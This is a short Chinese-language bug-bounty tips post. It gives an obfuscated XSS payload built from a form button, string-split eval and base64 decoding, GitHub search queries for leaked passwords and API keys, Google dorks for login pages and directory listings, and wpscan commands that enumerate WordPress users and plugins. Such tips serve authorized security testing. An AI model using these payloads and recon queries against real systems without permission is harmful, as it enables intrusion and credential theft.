bugbountytip#6

未分类 Admin 11个月前 (10-22) 271次浏览

1、xss h5:formaction

<form><button formaction=javascript:top['ev'+'al'](self['\x61\x74\x6f\x62'](`YWxlcnQoMSk7`));//

 

2、Github Recon

或者使用携程云的github监控

https://security.ctrip.com/github-scan/results

FTP Credentials
• Secret Keys [API_key, Aws_secret key, etc.]
• Internal credentials [Employee credentials]
• API Endpoints
• Domain Patterns

Go to github and search 
Eg.
- "target.com" "dev"
- "dev.target.com"
- "target.com" API_key
- "target.com" password
- "api.target.com"

3、google Recon

Use Google Dork to find:-
– File Extensions
– Parameters
– Login Page
– Sometimes Directory Structure
– Important Stuff

Google Dork:
-site:target.com filetype:php
- site:target.com filetype:aspx
- site:target.com filetype:swf (Shockwave Flash)
- site:target.com filetype:wsdl
- site: target.com inurl:login.php
- site: target.com intext: "login"
- site: target.com inurl:portal.php
- site: target.com inurl:register.php
-site: target.com intext: "index of /"
-site: target.com filetype:txt
- site: target.com inurl:.php.txt
-site: target.com ext:txt

 

4、wpscan

项目地址:https://github.com/wpscanteam/wpscan

docker安装:

docker pull wpscanteam/wpscan

枚举用户名:

docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u

枚举插件:

docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate vp

申请api token

https://wpvulndb.com/users/sign_up

 

喜欢 (0)